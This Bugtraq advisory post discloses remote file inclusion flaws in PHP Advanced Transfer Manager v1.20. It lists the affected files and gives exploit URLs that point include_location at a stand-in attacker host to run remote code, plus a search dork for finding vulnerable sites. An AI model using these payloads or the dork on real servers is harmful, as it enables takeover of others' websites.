Bugtraq mailing list archives
PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities
From: l0x3 () hotmail com
Date: 10 Sep 2006 17:19:00 -0000
+-------------------------------------------------------------------- + + PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities + +------------------------------------------------------------------- + + Affected Software .: Software + Version .............: PHP Advanced Transfer Manager v1.20 + Venedor ...........: http://phpatm.free.fr/ + Class .............: Remote File Inclusion + Risk ..............: High (Remote File Ex3cut1on) + Discovered by ..........: Eddy_BAck0o + Contact ...........: l0x3[at]hotmail.com ; www.LEzr.com/vB + +-------------------------------------------------------------------- + + This weakness in the security of a long Time ; + but I had not deployed before ; + and many of the sites included This weakness version ... + you can be sure for that by dork it + intext:\"Powered by PHP Advanced Transfer Manager v1.20" + Ex --> victom.com/[local]/anyfile:=)?include_location=http://www.yourev1l.com/r0x.txt?cmd + +-------------------------------------------------------------------- + ./index Directory ... ~ [Login.php] +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + include($include_location.'include/conf.php'); + include($include_location.'include/common.'.$phpExt); +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + Line --> 26 - 625 + Ex --> http://www.victom.com/[path]/Login.php?include_location=http://www.yourev1l.com/r0x.txt?cmd + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ [activate.php] +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + include($include_location.'include/conf.php'); + include($include_location.'include/common.'.$phpExt); +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + Line --> 26 - 121 + Ex --> http://www.victom.com/[path]/activate.php?include_location=http://www.yourev1l.com/r0x.txt?cmd + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ [configure.php] +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + include($include_location.'include/conf.php'); + include($include_location.'include/common.'.$phpExt); +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + Line --> 26 - 165 + Ex --> http://www.victom.com/[path]/configure.php?include_location=http://www.yourev1l.com/r0x.txt?cmd + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ confirm.php < -------- 26 - 122 ~ fileop.php < -------- 26 - 145 ~ getimg.php < -------- 26 - 56 ~ ipblocked.php < -------- 25 - 71 ~ register.php < -------- 26 - 291 ~ showrecent.php < -------- 26 - 275 ~ showtophits.php < -------- 26 - 237 ~ usrmanag.php < -------- 26 - 381 ~ viewer_bottom.php < -------- 27 - 50 ~ viewer_content.php < -------- 27 - 49 ~ viewer_top.php < -------- 27 - 57 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + gr33tz 4ll ;LEzr.com/vB [ MoHaJaLi ] :P My best; + and all My the Team ;.... +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Current thread:
- PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities l0x3 (Sep 11)
- Re: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities Carsten Eilers (Sep 13)
- <Possible follow-ups>
- Re: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities Carsten Eilers (Sep 14)
- Re: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities Steven M. Christey (Sep 15)